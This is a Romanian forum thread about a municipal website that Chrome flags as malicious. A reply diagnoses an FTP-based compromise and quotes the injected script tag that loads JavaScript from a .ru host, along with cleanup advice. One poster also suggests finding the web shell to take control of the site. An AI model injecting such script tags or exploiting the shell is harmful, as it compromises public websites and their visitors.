Jump to content
BogdanNBV

Ce are siteul acesta?

Recommended Posts

Posted (edited)

am incercat sa accesez siteul primariei din orasul meu sa ma uit putin cine mai trece prin centrul orasului si se pare ca ori cineva l-a h4x0r!7 ori nu stiu de ce imi spune google chrome ca poate dauna computerului... am incercat sa-l fac sa ma lase sa il accesez dar mi-a aratat o lista in care erau insiruite mai multe locatii de pe server ale unor imagini in format .jpg si .png.. deci imi puteti spune de ce il detecteaza google chrome ca malware ? ;;)

**EDIT**: Am uitat sa pun si linkul catre site =)) asta e http://www.primaria-resita.ro/

Edited by BogdanNBV
Posted

Acest site distribuie fisiere malware. Este un virus introdus prin FTP, datorita neschibarii parolei.

Uite si scriptul care infecteaza pagina:

<script type="text/javascript" src="http://riotassistance.ru/VGA.js"></script>

, propunele sa-l scoti si sa iei cativa bani.

Toate fisierele .php si .html din ftp sunt infectate, dupa ce ai scos toate scripturile de genul din toate paginile .php, il inscrii la Google Webmasters apoi trimiti mesaj precum ca ai scos virusul si site-ul va fi din nou activ in google si nu va mai aparea ca fiind infectat.

Posted
Acest site distribuie fisiere malware. Este un virus introdus prin FTP, datorita neschibarii parolei.

Uite si scriptul care infecteaza pagina:

<script type="text/javascript" src="http://riotassistance.ru/VGA.js"></script>

, propunele sa-l scoti si sa iei cativa bani.

Toate fisierele .php si .html din ftp sunt infectate, dupa ce ai scos toate scripturile de genul din toate paginile .php, il inscrii la Google Webmasters apoi trimiti mesaj precum ca ai scos virusul si site-ul va fi din nou activ in google si nu va mai aparea ca fiind infectat.

Sau mai simplu cauta shellul de pe care s-a infectat toate fisierele(sunt aproape sigur ca s-a folosit cineva dintr-un shell de functia mass code injection) si faci ce vrei cu siteul:D

Sau si mai simplu instaleaza sandboxie si ruleaza browserul sandboxat si gata!

Posted
Sau mai simplu cauta shellul de pe care s-a infectat toate fisierele(sunt aproape sigur ca s-a folosit cineva dintr-un shell de functia mass code injection) si faci ce vrei cu siteul:D

Sau si mai simplu instaleaza sandboxie si ruleaza browserul sandboxat si gata!

Da nu mai bine ia legatura cu cei de la primarie sa le faca site-ul si sa ia si el un ban ? Ar iesi toata lumea bine, primaria cu site-ul din nou functionabil, si el cu un ban in buzunar.

Posted

mersi pentru sugestii da la cat de mult urasc io orasu asta si primaria de cacat nici pentru bani nu-i ajut :) primaru e ratat nu face nimic bun... si cum a zis si Paul4games n-au sa ma plateasca... pt ca sunt prea mic sau gasesc ei vreun motiv asa ca nu are rost mai bine ii las in treaba lor cu siteul infectat si gata :D